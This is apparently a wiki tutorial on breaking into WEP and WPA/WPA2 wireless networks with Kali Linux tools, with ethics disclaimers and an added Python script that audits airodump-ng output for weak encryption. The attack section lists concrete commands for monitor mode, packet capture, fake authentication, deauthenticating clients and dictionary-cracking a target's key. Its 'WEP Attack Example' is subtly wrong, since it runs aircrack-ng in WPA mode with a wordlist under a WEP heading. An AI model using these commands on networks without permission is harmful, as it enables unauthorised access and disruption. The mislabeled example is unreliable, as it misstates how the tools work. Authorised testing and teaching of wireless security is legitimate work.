Wireless Techniques and Protocols (WEP, WPA/WPA2) (en)

From OnnoWiki

Disclaimer: This information is provided for educational and research purposes in the field of cybersecurity. Use of this information for illegal or unethical purposes is strictly prohibited. Always perform penetration testing with the permission of the network owner.

Introduction

Kali Linux is a popular Linux distribution among ethical hackers and cybersecurity professionals. One of its main features is a comprehensive collection of tools for penetration testing networks, including wireless networks. In this context, we will discuss common hacking techniques used to break into wireless networks that use the WEP, WPA, and WPA2 security protocols.

Wireless Security Protocols

  • WEP (Wired Equivalent Privacy): The oldest and weakest security protocol. Easily cracked using various techniques.
  • WPA (Wi-Fi Protected Access): The successor to WEP, offers improved security, but is still vulnerable to some attacks.
  • WPA2: The current security standard, considered much more secure than WEP and WPA.

Tools Used in Kali Linux

  • Aircrack-ng: A complete suite of tools for cracking WEP and WPA/WPA2.
  • iwconfig: Used to configure wireless interfaces.
  • airodump-ng: Collects packets from a wireless network.
  • aireplay-ng: Injects packets into a wireless network.
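
The protocol ranking above can be used to audit your own access points from the CSV file that airodump-ng writes next to the capture (for example capture-01.csv when run with --write capture). The following Python code is an added example, not part of the original page or of the aircrack-ng project; the column layout is assumed from airodump-ng's CSV output, the sample data and verdict labels are constructed, and it goes slightly beyond the page by also flagging open networks.

```python
# Added example: flag access points in an airodump-ng CSV that still use
# WEP, WPA/TKIP or no encryption. SAMPLE_CSV is constructed test data.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP, WEP, , -40, 120, 900, 0. 0. 0. 0, 7, lab-old,
02:00:00:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2 WPA, CCMP TKIP, PSK, -55, 98, 0, 0. 0. 0. 0, 9, lab,mixed,
02:00:00:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -61, 77, 0, 0. 0. 0. 0, 8, lab-wpa2,
02:00:00:00:00:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, OPN, , , -70, 40, 0, 0. 0. 0. 0, 9, lab-guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50, 31, 02:00:00:00:00:03,
"""

def parse_access_points(text):
    """Return one dict per access point from the first section of the CSV."""
    aps, header = [], None
    for line in text.splitlines():
        raw = line.split(",")
        fields = [f.strip() for f in raw]
        if header is None:
            if fields[0] == "BSSID":      # skip anything before the header
                header = fields
            continue
        if not line.strip():
            break                         # blank line: station section follows
        if len(fields) < len(header):
            continue                      # truncated row, ignore it
        # An ESSID may contain commas: it is everything between the 13
        # fixed columns and the trailing Key column.
        essid = ",".join(raw[13:-1]).strip()
        aps.append({"bssid": fields[0], "privacy": fields[5],
                    "cipher": fields[6], "essid": essid})
    return aps

def classify(ap):
    """Map the Privacy/Cipher columns to a verdict (labels are this example's own)."""
    modes, ciphers = set(ap["privacy"].split()), set(ap["cipher"].split())
    if not modes:
        return "unknown"                  # airodump-ng has not identified it yet
    if "OPN" in modes:
        return "open"
    if "WEP" in modes:
        return "wep"
    if "WPA" in modes or "TKIP" in ciphers:
        return "legacy-wpa"               # WPA1 or mixed mode still accepted
    return "ok"

def audit(text):
    """Return (essid, bssid, verdict) for every access point that is not 'ok'."""
    rows = [(ap["essid"], ap["bssid"], classify(ap)) for ap in parse_access_points(text)]
    return [r for r in rows if r[2] != "ok"]

if __name__ == "__main__":
    for essid, bssid, verdict in audit(SAMPLE_CSV):
        print(f"{verdict:10} {bssid}  {essid}")
```

A mixed-mode network ("WPA2 WPA") is reported as legacy-wpa because the access point still accepts the older protocol.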

General Steps

  • Monitor Mode: Switch your wireless interface to monitor mode to capture packets.
    airmon-ng start wlan0
  • Network Detection: Scan for wireless networks around you.
    airodump-ng mon0
  • Select Target: Select the network you want to attack based on its BSSID (Basic Service Set Identifier).
  • Analyze Packets: Analyze captured packets to get information like handshakes, IVs (Initialization Vectors), and nonces.
  • Perform the Attack:
    • WEP: Use FMS (Fluhrer, Mantin, Shamir) or KoreK attacks to crack the WEP key.
    • WPA/WPA2: Use dictionary attacks or brute force attacks to find the passphrase.
  • Crack the Key: After getting enough packets, use aircrack-ng to crack the key.
    aircrack-ng -a 2 -b <BSSID> -w /wordlist.txt capture.cap

WEP Attack Example with Aircrack-ng

# Start capturing packets
airodump-ng mon0

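# Capture packets and write them to a file (capture-01.cap)
airodump-ng mon0 --write capture

# Fake authentication with the access point, then deauthenticate the client
aireplay-ng --fakeauth 0 -a <BSSID> -c <client_BSSID> mon0
aireplay-ng --deauth 0 -a <BSSID> -c <client_BSSID> mon0

# Run aircrack-ng on the capture (-a 2 selects WPA/WPA2-PSK mode and uses the wordlist given with -w)
aircrack-ng -a 2 -b <BSSID> -w /wordlist.txt capture-01.cap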

Ethical Considerations

  • Permission: Always get permission from the network owner before performing penetration testing.
  • Educational Purpose: Use this information for educational and research purposes, not for malicious purposes.
  • Legal: Violations of network security can result in legal consequences.

Conclusion

Wireless network hacking is a complex and ever-evolving topic. Kali Linux provides very useful tools for performing penetration testing. However, it is important to remember that wireless network security is constantly being improved, and new techniques are constantly emerging. Therefore, it is important to continue learning and updating your knowledge of cybersecurity.

Note: The information above is just a general overview. For a deeper understanding, it is recommended to study the official documentation of the mentioned tools and follow more detailed tutorials.

Interesting Links